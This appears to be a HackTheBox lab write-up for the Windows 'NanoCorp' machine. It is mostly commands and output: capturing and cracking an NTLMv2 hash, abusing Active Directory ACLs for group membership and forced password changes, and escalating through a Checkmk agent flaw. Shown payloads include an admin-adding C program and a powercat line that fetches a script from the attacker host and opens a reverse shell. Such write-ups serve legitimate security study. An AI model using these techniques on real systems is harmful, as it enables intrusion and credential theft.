xsspresso
xsspresso
WriteupsHTB — NanoCorp
ADMediumWindows

HTB — NanoCorp

MSSQL enumeration with credential discovery, followed by Active Directory privilege escalation through ACL misconfigurations.

November 8, 2025HackTheBox
#MSSQL#AD#ACL Abuse

nmap

sh
nmap -sV -sC -p- -Pn 10.129.243.199 -oN nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-08 23:50 EST
Stats: 0:03:41 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.36% done; ETC: 23:54 (0:00:00 remaining)
Nmap scan report for 10.129.243.199
Host is up (0.019s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
80/tcp    open  http              Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://nanocorp.htb/
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2025-11-09 11:52:46Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Not valid before: 2025-04-06T22:58:43
|_Not valid after:  2026-04-06T23:18:43
| tls-alpn: 
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
|_ssl-date: TLS randomness does not represent time
9389/tcp  open  mc-nmf            .NET Message Framing
49664/tcp open  msrpc             Microsoft Windows RPC
49668/tcp open  msrpc             Microsoft Windows RPC
54191/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
54196/tcp open  msrpc             Microsoft Windows RPC
54225/tcp open  msrpc             Microsoft Windows RPC
Service Info: Hosts: nanocorp.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-11-09T11:53:39
|_  start_date: N/A
|_clock-skew: 6h59m36s
 

zip upload

  • upload zip to extract hash
  • https://github.com/0x6rss/CVE-2025-24071_PoC
sh
responder -I tun0
sh
python3 poc.py                                                                                                                                                   130
Enter your file name: test
Enter IP (EX: 192.168.1.162): 10.10.14.37
completed

sh
responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|
 
           NBT-NS, LLMNR & MDNS Responder 3.1.3.0
 
  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder
 
  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C
 
 
[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]
 
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
 
[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]
 
[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]
 
[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.37]
    Responder IPv6             [dead:beef:2::1023]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']
 
[+] Current Session Variables:
    Responder Machine Name     [WIN-YKE9U8C07QE]
    Responder Domain Name      [FH4K.LOCAL]
    Responder DCE-RPC Port     [49565]
 
[+] Listening for events...
 
[SMB] NTLMv2-SSP Client   : 10.129.243.199
[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash     : web_svc::NANOCORP:2039376b24063147:87319B69E6163F5F4241441FCAC7CBD3:010100000000000080611C685651DC010919FB181C143F5E00000000020008004600480034004B0001001E00570049004E002D0059004B0045003900550038004300300037005100450004003400570049004E002D0059004B004500390055003800430030003700510045002E004600480034004B002E004C004F00430041004C00030014004600480034004B002E004C004F00430041004C00050014004600480034004B002E004C004F00430041004C000700080080611C685651DC0106000400020000000800300030000000000000000000000000200000FACD7B65247A73390894CD232816308BE88223152713F119A77178D8E84162B40A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00330037000000000000000000

hashcat

sh
web_svc::NANOCORP:2039376b24063147:87319B69E6163F5F4241441FCAC7CBD3:010100000000000080611C685651DC010919FB181C143F5E00000000020008004600480034004B0001001E00570049004E002D0059004B0045003900550038004300300037005100450004003400570049004E002D0059004B004500390055003800430030003700510045002E004600480034004B002E004C004F00430041004C00030014004600480034004B002E004C004F00430041004C00050014004600480034004B002E004C004F00430041004C000700080080611C685651DC0106000400020000000800300030000000000000000000000000200000FACD7B65247A73390894CD232816308BE88223152713F119A77178D8E84162B40A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00330037000000000000000000
sh
hashcat -m 5600 web_svc.ntlmv2 /usr/share/wordlists/rockyou.txt 
 
WEB_SVC::NANOCORP:2039376b24063147:87319b69...:010100000000000080611c685651dc010919fb181c143f5e00000000020008004600480034004b0001001e00570049004e002d0059004b0045003900550038004300300037005100450004003400570049004e002d0059004b004500390055003800430030003700510045002e004600480034004b002e004c004f00430041004c00030014004600480034004b002e004c004f00430041004c00050014004600480034004b002e004c004f00430041004c000700080080611c685651dc0106000400020000000800300030000000000000000000000000200000facd7b65247a73390894cd232816308be88223152713f119a77178d8e84162b40a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00330037000000000000000000:dksehdgh712!@#

creds

sh
nxc smb 10.129.243.199 -u web_svc -p 'dksehdgh712!@#'
SMB         10.129.243.199  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.243.199  445    DC01             [+] nanocorp.htb\web_svc:dksehdgh712!@# 

bloodhound collector

sh
bloodhound-python -u 'web_svc' -p 'dksehdgh712!@#' -ns 10.129.243.199 -d nanocorp.htb -c all
sh
zip -r nanocorp.zip *.json

AddSelf

  • bloodyad worked to add to it_support
sh
bloodyAD --host "10.129.243.199" -d "nanocorp.htb" -u "web_svc" -p 'dksehdgh712!@#' add groupMember "it_support" "web_svc"    
[+] web_svc added to it_support
 
sh
net rpc group members "it_support" -U "nanocorp"/"web_svc"%'dksehdgh712!@#' -S "nanocorp.htb"
 
NANOCORP\web_svc

ForceChangePassword

sh
bloodyAD --host "10.129.243.199" -d "nanocorp.htb" -u "web_svc" -p 'dksehdgh712!@#' set password "monitoring_svc" 'dksehdgh712!@#'
 
[+] Password changed successfully!
  • need to change the password similar to the web_svc for password policy requirements
sh
sudo ntpdate  10.129.243.199 && nxc smb 10.129.243.199 -u monitoring_svc -p 'dksehdgh712!@#' -k 
2025-11-09 21:06:30.824755 (-0500) -0.002329 +/- 0.008283 10.129.243.199 s1 no-leap
SMB         10.129.243.199  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.243.199  445    DC01             [+] nanocorp.htb\monitoring_svc:dksehdgh712!@# 

password policy

sh
nxc smb 10.129.1.158 -u web_svc -p 'dksehdgh712!@#' --pass-pol                    
SMB         10.129.1.158    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.1.158    445    DC01             [+] nanocorp.htb\web_svc:dksehdgh712!@# 
SMB         10.129.1.158    445    DC01             [+] Dumping password info for domain: NANOCORP
SMB         10.129.1.158    445    DC01             Minimum password length: 7
SMB         10.129.1.158    445    DC01             Password history length: 24
SMB         10.129.1.158    445    DC01             Maximum password age: 41 days 23 hours 53 minutes 
SMB         10.129.1.158    445    DC01             
SMB         10.129.1.158    445    DC01             Password Complexity Flags: 000001
SMB         10.129.1.158    445    DC01                 Domain Refuse Password Change: 0
SMB         10.129.1.158    445    DC01                 Domain Password Store Cleartext: 0
SMB         10.129.1.158    445    DC01                 Domain Password Lockout Admins: 0
SMB         10.129.1.158    445    DC01                 Domain Password No Clear Change: 0
SMB         10.129.1.158    445    DC01                 Domain Password No Anon Change: 0
SMB         10.129.1.158    445    DC01                 Domain Password Complex: 1
SMB         10.129.1.158    445    DC01             
SMB         10.129.1.158    445    DC01             Minimum password age: 1 day 4 minutes 
SMB         10.129.1.158    445    DC01             Reset Account Lockout Counter: 30 minutes 
SMB         10.129.1.158    445    DC01             Locked Account Duration: 30 minutes 
SMB         10.129.1.158    445    DC01             Account Lockout Threshold: None
SMB         10.129.1.158    445    DC01             Forced Log off Time: Not Set
sh
ntpdate 10.129.1.158 && impacket-getTGT nanocorp.htb/web_svc:'dksehdgh712!@#'
sh
ntpdate 10.129.243.199 && impacket-getTGT nanocorp.htb/monitoring_svc:'dksehdgh712!@#' 
2025-11-09 21:16:34.561987 (-0500) +25199.147576 +/- 0.037085 10.129.243.199 s1 no-leap
CLOCK: time stepped by 25199.147576
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Saving ticket in monitoring_svc.ccache
sh
export KRB5CCNAME=/opt/winrmexec/web_svc.ccache
sh
export KRB5CCNAME=/opt/winrmexec/monitoring_svc.ccache
sh
sudo ntpdate  10.129.243.199 && nxc smb 10.129.243.199 -u monitoring_svc -p 'dksehdgh712!@#' -k 
2025-11-09 21:06:30.824755 (-0500) -0.002329 +/- 0.008283 10.129.243.199 s1 no-leap
SMB         10.129.243.199  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.243.199  445    DC01             [+] nanocorp.htb\monitoring_svc:dksehdgh712!@# 
 
sh
export KRB5CCNAME=/home/sake/htb/seasonal/NanoCorp/monitoring_svc.ccache

winrm

sh
ntpdate 10.129.243.199 && python3 evil_winrmexec.py -k -no-pass -ssl dc01.nanocorp.htb                                                                             1
2025-11-11 01:05:15.609736 (-0500) +25200.976278 +/- 0.008074 10.129.243.199 s1 no-leap
CLOCK: time stepped by 25200.976278
[*] '-target_ip' not specified, using dc01.nanocorp.htb
[*] '-port' not specified, using 5986
[*] '-url' not specified, using https://dc01.nanocorp.htb:5986/wsman
[*] using domain and username from ccache: NANOCORP.HTB\monitoring_svc
[*] '-spn' not specified, using HTTP/dc01.nanocorp.htb@NANOCORP.HTB
[*] '-dc-ip' not specified, using NANOCORP.HTB
[*] requesting TGS for HTTP/dc01.nanocorp.htb@NANOCORP.HTB
 
Ctrl+D to exit, Ctrl+C will try to interrupt the running pipeline gracefully
This is not an interactive shell! If you need to run programs that expect
inputs from stdin, or exploits that spawn cmd.exe, etc., pop a !revshell
 
Special !bangs:
  !download RPATH [LPATH]          # downloads a file or directory (as a zip file); use 'PATH'
                                   # if it contains whitespace
 
  !upload [-xor] LPATH [RPATH]     # uploads a file; use 'PATH' if it contains whitespace, though use iwr
                                   # if you can reach your ip from the box, because this can be slow;
                                   # use -xor only in conjunction with !psrun/!netrun
 
  !amsi                            # amsi bypass, run this right after you get a prompt
 
  !psrun [-xor] URL                # run .ps1 script from url; uses ScriptBlock smuggling, so no !amsi patching is
                                   # needed unless that script tries to load a .NET assembly; if you can't reach
                                   # your ip, !upload with -xor first, then !psrun -xor 'c:\foo\bar.ps1' (needs absolute path)
 
  !netrun [-xor] URL [ARG] [ARG]   # run .NET assembly from url, use 'ARG' if it contains whitespace;
                                   # !amsi first if you're getting '...program with an incorrect format' errors;
                                   # if you can't reach your ip, !upload with -xor first then !netrun -xor 'c:\foo\bar.exe' (needs absolute path)
 
  !revshell IP PORT                # pop a revshell at IP:PORT with stdin/out/err redirected through a socket; if you can't reach your ip and you
                                   # you need to run an executable that expects input, try:
                                   # PS> Set-Content -Encoding ASCII 'stdin.txt' "line1`nline2`nline3"
                                   # PS> Start-Process some.exe -RedirectStandardInput 'stdin.txt' -RedirectStandardOutput 'stdout.txt'
 
  !log                             # start logging output to winrmexec_[timestamp]_stdout.log
  !stoplog                         # stop logging output to winrmexec_[timestamp]_stdout.log
 
PS C:\Users\monitoring_svc\Documents> whoami
nanocorp\monitoring_svc
 

user.txt

sh
PS C:\Users\monitoring_svc\Desktop> cat user.txt
4a4a0138...

privilege escalation

checkmk

  • https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/
powershell
PS C:\Program Files (x86)> ls
 
 
    Directory: C:\Program Files (x86)
 
 
Mode                 LastWriteTime         Length Name                                                                  
----                 -------------         ------ ----                                                                  
d-----          4/5/2025   4:17 PM                checkmk                                                               
d-----          5/8/2021   1:34 AM                Common Files                                                          
d-----         11/3/2025   4:13 PM                Internet Explorer                                                     
d-----          5/8/2021   2:40 AM                Microsoft                                                             
d-----          5/8/2021   1:34 AM                Microsoft.NET                                                         
d-----          5/8/2021   2:35 AM                Windows Defender                                                      
d-----         11/3/2025   4:13 PM                Windows Mail                                                          
d-----         11/3/2025   4:13 PM                Windows Media Player                                                  
d-----          5/8/2021   2:35 AM                Windows NT                                                            
d-----         11/3/2025   4:13 PM                Windows Photo Viewer                                                  
d-----          5/8/2021   1:34 AM                WindowsPowerShell

winpeas

sh
PS C:\Users\monitoring_svc\Documents> Invoke-WebRequest http://10.10.14.37/winPEASx64.exe -OutFile winPEASx64.exe

runas

sh
PS C:\Users\monitoring_svc\Documents> Invoke-WebRequest http://10.10.14.37/RunasCs.exe -OutFile RunasCs.exe
powershell
PS C:\Users\monitoring_svc\Documents> .\RunasCs.exe  "web_svc" 'dksehdgh712!@#' powershell.exe -r 10.10.14.37:1234
powershell
PS C:\Users\monitoring_svc\Documents> .\RunasCs.exe  "monitoring_svc" 'dksehdgh712!@#' powershell.exe -r 10.10.14.37:445
powershell
PS C:\Windows\system32> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
 
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
 
Name                   State   PathName                                                                         
----                   -----   --------                                                                         
ADWS                   Running C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe                        
BFE                    Running C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p              
BrokerInfrastructure   Running C:\Windows\system32\svchost.exe -k DcomLaunch -p                                 
camsvc                 Running C:\Windows\system32\svchost.exe -k appmodel -p                                   
CDPSvc                 Running C:\Windows\system32\svchost.exe -k LocalService -p                               
CertPropSvc            Running C:\Windows\system32\svchost.exe -k netsvcs                                       
CheckmkService         Running "C:\Program Files (x86)\checkmk\service\check_mk_agent.exe"    
  • version 2.1
sh
PS C:\programdata> cat cmk_agent_uninstall.txt
cat cmk_agent_uninstall.txt
Checkmk monitoring agent service - 2.1, 64-bit
 

mal.c

c
#include <stdlib.h>
 
int main ()
{
  int i;
  
  i = system ("net localgroup administrators web_svc /add");
  
  return 0;
}
sh
x86_64-w64-mingw32-gcc mal.c -o mal.exe
powershell
PS C:\users\web_svc\desktop> Invoke-WebRequest http://10.10.14.37/mal.exe -OutFile mal.exe
powershell
1..30000 | foreach { copy C:\users\monitoring_svc\documents\mal.exe C:\Windows\Temp\cmk_all_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true; }
powershell
10000..30000 | foreach { copy C:\users\web_svc\mal.exe C:\Windows\Temp\cmk_all_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true; }
powershell
PS C:\windows\temp> msiexec /fa C:\Windows\Installer\1e6f2.msi
powershell
PS C:\windows\installer> Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\*\InstallProperties' | Select-Object DisplayName, LocalPackage | Where-Object { $_.DisplayName } | Sort-Object DisplayName
 
Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\*\InstallProperties' | Select-Object DisplayName, LocalPackage | Where-Object { $_.DisplayName } | Sort-Object DisplayName
 
DisplayName                                                    LocalPackage                  
-----------                                                    ------------                  
Check MK Agent 2.1                                             C:\Windows\Installer\1e6f2.msi
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 C:\Windows\Installer\387ce.msi
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532    C:\Windows\Installer\387ca.msi
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 C:\Windows\Installer\387c6.msi
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532    C:\Windows\Installer\387c2.msi
VMware Tools  
sh
PS C:\windows\temp> ls
ls
 
 
    Directory: C:\windows\temp
 
 
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         11/3/2025   5:05 PM                vmware-SYSTEM                                                        
-a----        11/10/2025   7:06 PM             53 af397ef2....db.ses                              
-a----        11/11/2025   3:49 AM         250202 checkmk_repair.log                                                   
-a----        11/11/2025   2:46 AM         115532 cmk_all_3128_0.cmd 
sh
PS C:\windows\temp> icacls cmk_all_3128_0.cmd
icacls cmk_all_3128_0.cmd
cmk_all_3128_0.cmd BUILTIN\Administrators:(I)(F)
                   NT AUTHORITY\SYSTEM:(I)(F)
                   NANOCORP\web_svc:(I)(F)
sh
PS C:\windows\temp> copy C:\users\web_svc\desktop\mal.exe cmk_all_3128_0.cmd
 
powershell
IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.37/powercat.ps1');powercat -c 10.10.14.37 -p 443 -e cmd
powershell
PS C:\Users\monitoring_svc\Documents> Invoke-WebRequest http://10.10.14.37/root.bat -OutFile root.bat
powershell
PS C:\Users\monitoring_svc\Documents> 1..30000 | foreach { copy C:\Users\monitoring_svc\Documents\root.bat C:\Windows\Temp\cmkall${_}_1.cmd; Set-ItemProperty -path C:\Windo
ws\Temp\cmkall${_}_1.cmd -name IsReadOnly -value $true; }
powershell
PS C:\windows\temp> msiexec /fa C:\Windows\Installer\1e6f2.msi 
powershell
PS C:\Users\monitoring_svc\Documents> 1..30000 | foreach { copy C:\Users\monitoring_svc\Documents\test.bat C:\Windows\Temp\cmkall${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmkall${_}_1.cmd -name IsReadOnly -value $true; }
powershell
PS C:\windows\temp> ls
ls
 
 
    Directory: C:\windows\temp
 
 
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         11/3/2025   5:05 PM                vmware-SYSTEM                                                        
-a----        11/11/2025   4:44 PM             53 af397ef2....db.ses                              
-a----        11/11/2025   4:47 PM           1069 cmk_all_2704_1.cmd                                                   
-a----        11/11/2025   4:47 PM            423 cmk_data_2704_2.cmd                                                  
-a----        11/11/2025   4:44 PM              0 mat-debug-5756.log  
powershell
1..20000 | foreach { copy C:\Users\monitoring_svc\Documents\root.bat C:\Windows\Temp\cmk_all_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true; }
powershell
1..20000 | foreach { copy C:\Users\monitoring_svc\Documents\root.bat C:\Windows\Temp\cmk_data_${_}_1.cmd; Set-ItemProperty -path C:\Windows\Temp\cmk_data_${_}_1.cmd -name IsReadOnly -value $true; }
powershell
PS C:\users\web_svc> ls
ls
 
 
    Directory: C:\users\web_svc
 
 
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-r---          4/5/2025   4:14 PM                3D Objects                                                           
d-r---          4/5/2025   4:14 PM                Contacts                                                             
d-r---          4/9/2025  12:51 AM                Desktop                                                              
d-r---          4/5/2025   4:14 PM                Documents                                                            
d-r---          4/5/2025   4:14 PM                Downloads                                                            
d-r---          4/5/2025   4:14 PM                Favorites                                                            
d-r---          4/9/2025  12:26 AM                Links                                                                
d-r---          4/5/2025   4:14 PM                Music                                                                
d-r---          4/5/2025   4:14 PM                Pictures                                                             
d-r---          4/5/2025   4:14 PM                Saved Games                                                          
d-r---          4/5/2025   4:14 PM                Searches                                                             
d-r---          4/5/2025   4:14 PM                Videos                                                               
-a----        11/11/2025   4:43 PM             34 root.txt   

root.txt

powershell
PS C:\users\web_svc> cat root.txt
cat root.txt
2877f505...